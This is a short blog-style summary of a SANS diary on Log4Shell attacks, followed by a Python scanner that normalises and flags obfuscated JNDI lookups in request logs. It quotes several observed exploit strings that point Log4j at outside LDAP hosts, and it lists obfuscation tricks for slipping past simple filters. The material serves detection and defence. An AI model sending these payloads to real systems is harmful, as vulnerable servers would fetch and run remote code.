[Blog]
◆ Log4j / Log4Shell Followup: What we see and how to defend (and how to access our data) (SANS, 2021/12/11)
https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/
[Details]
■ Attack pattern
${jndi:ldap://aa895bba3900.bingsearchlib.com:39356/a}
■ Obfuscation
◇ URL encoding
- $%7b => {
- $%7d => }
◇ upper / lower lookups
- ${lower:l} => l
- ${upper:a} => A
■ Obfuscation examples
/$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D
/$%7Bjndi:ldap://x-ios-validation.com.lc1wnt7yguuuk0qurdw600boffl59u.burpcollaborator.net%7D
${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
=> ${jndi:ldap://world80.log4j.binAryedge.io:80/callback}
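The obfuscation tricks listed above (percent-encoded braces and `${lower:}` / `${upper:}` lookups) defeat a naive search for the literal string `${jndi:`. The following is an added example, not code from the SANS diary: it normalizes request lines by percent-decoding them (bounded, so double-encoding is also unwrapped) and resolving case lookups innermost-first, then flags any line that carries a JNDI lookup. The sample log lines and the host `placeholder.example` are constructed for illustration.

```python
"""Normalize Log4Shell-style probes in web request logs and flag the JNDI lookup."""
import re
from urllib.parse import unquote

# Constructed sample request lines (assumption: not from the SANS diary or real traffic);
# hosts are placeholders. Each mirrors one of the obfuscation tricks listed above.
SAMPLE_LOGS = [
    'GET /${jndi:ldap://placeholder.example:1389/a} HTTP/1.1',                          # plain
    'GET /$%7Bjndi:ldap://placeholder.example:1389/Exploit%7D HTTP/1.1',                # URL-encoded braces
    'GET /${jndi:${lower:l}${lower:d}a${lower:p}://placeholder.example:80/cb} HTTP/1.1',  # lower lookups
    'GET /index.html HTTP/1.1',                                                        # benign
    'GET /$%257Bjndi:ldap://placeholder.example/x%257D HTTP/1.1',                       # double-encoded
]

# ${lower:x} / ${upper:x} with no nested braces inside x; resolved innermost-first by looping.
LOOKUP_RE = re.compile(r'\$\{(lower|upper):([^${}]*)\}', re.IGNORECASE)
# The lookup we ultimately care about, matched case-insensitively after normalization.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def url_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded probes are unwrapped too."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def resolve_case_lookups(s: str, max_rounds: int = 10) -> str:
    """Replace ${lower:x} / ${upper:x} with x in the requested case until none remain."""
    def repl(m: re.Match) -> str:
        kind, text = m.group(1).lower(), m.group(2)
        return text.lower() if kind == 'lower' else text.upper()

    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(repl, s)
        if new == s:
            break
        s = new
    return s


def normalize(s: str) -> str:
    """Undo the obfuscation layers so the payload can be matched literally."""
    return resolve_case_lookups(url_decode(s))


def is_jndi_probe(line: str) -> bool:
    """True if the normalized line contains a ${jndi: lookup."""
    return JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Return (normalized, original) pairs for every line carrying a JNDI lookup."""
    return [(normalize(line), line) for line in lines if is_jndi_probe(line)]


if __name__ == '__main__':
    for normalized, original in scan(SAMPLE_LOGS):
        print(f'HIT  {original}\n  -> {normalized}')
```

Running the block prints four hits out of the five constructed lines; the benign `index.html` request is not flagged. The normalization is deliberately bounded (`max_rounds`) so a pathological input cannot keep the scanner looping.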